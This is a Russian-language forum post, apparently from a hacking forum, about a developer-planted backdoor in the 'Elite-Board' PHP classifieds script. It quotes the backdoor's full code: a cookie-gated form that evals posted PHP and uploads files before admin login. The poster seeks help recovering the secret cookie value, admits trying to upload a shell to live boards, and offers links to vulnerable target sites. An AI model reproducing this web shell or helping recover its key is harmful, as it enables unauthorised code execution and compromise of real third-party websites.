Друзья, всех приветствую! Стараюсь по пустякам не обращаться за помощью, но ситуация складывается абсолютно безнадёжная. Существует старый, как говно мамонта, скрипт доски объявлений - "Elite-Board", разработчик: http://illusionweb.org/ В данный скрипт разработчик внедрил бэкдор, подробнее: http://searchengines.guru/showthread.php?t=770644 Код бэкдора: PHP: if(isset($_COOKIE['megasecret'])){ if($_COOKIE['megasecret'] == 'удалено на всякий случай') { echo '<form name=\"megaform\" action=\"\" method=\"post\" enctype=\"multipart/form-data\"> <input name=\"mega-path\" type=\"text\" value=\"../тоже удалено, успешно гуглится ибо/\"> <input name=\"mega-file\" type=\"file\"> <br /> <textarea name=\"mega-exe\" rows=\"10\" cols=\"100\" wrap=\"off\"></textarea> <br /> <input name=\"mega-str\" type=\"checkbox\" value=\"ON\"> stripslashes <input type=\"submit\" value=\"Send / Execute\"> </form> <hr> <textarea rows=\"10\" cols=\"100\" wrap=\"off\">'; if($_POST['mega-exe'] != '') { if($_POST['mega-str'] != '') { $_POST['mega-exe'] = stripslashes($_POST['mega-exe']); } eval($_POST['mega-exe']); } echo '</textarea>'; if(file_exists($_FILES['mega-file']['tmp_name'])) { move_uploaded_file($_FILES['mega-file']['tmp_name'], $_POST['mega-path'].$_FILES['mega-file']['name']); } exit(); }} Бэкдор покоится в файле includes/optimizer/admin/funct.php, инклудится при входе в админку (до авторизации, т.е. авторизация не требуется). Бэкдор по стандарту завёрнут в eval(base64_decode()). Сам файл (funct.php) зашифрован зендом. Бэкдор присутствует в версиях Elite-Board 2.0 < 2.1.130128 (после замеса автор его выпилил: http://blog.illusionweb.org/blog/post/57/). Задача: узнать с какой строкой идёт сравнение в PHP: if($_COOKIE['megasecret'] == 'удалено на всякий случай') Неделю! Я уже неделю бьюсь над этим вопросом! Гугл затёр до дыр. Найти подходящий дистрибутив не удалось, перерыл всё по всем возможным и невозможным запросам. Попытки залиться шеллом на доски с подходящей версией также успехом не увенчались. Если кто-нибудь изъявит желание поучаствовать в этом мероприятии, то скину в ЛС ссылки на доски с подходящей версией. P.S.: Вообще рассчитываю на чудо - мало ли у кого-нибудь пылится этот скрипт на харде.
Тут все трупы что ли? Неужели ни у кого нет соображений, как же всё-таки раздобыть сурс этой доски? Пошуршите на винтах, может у кого валяется. Дурдом. Есть бэкдор, но в этих ваших интернетах, где никогда ничего не пропадает, невозможно найти исходник скрипта.
Загуглился уже до того, что даже откопал часть исходника, который кто-то когда-то прогонял через онлайн-сервис декодирования base64: http://www.unphp.net/decode/304e6ee05b39bbf2882e206bb10a71ad/
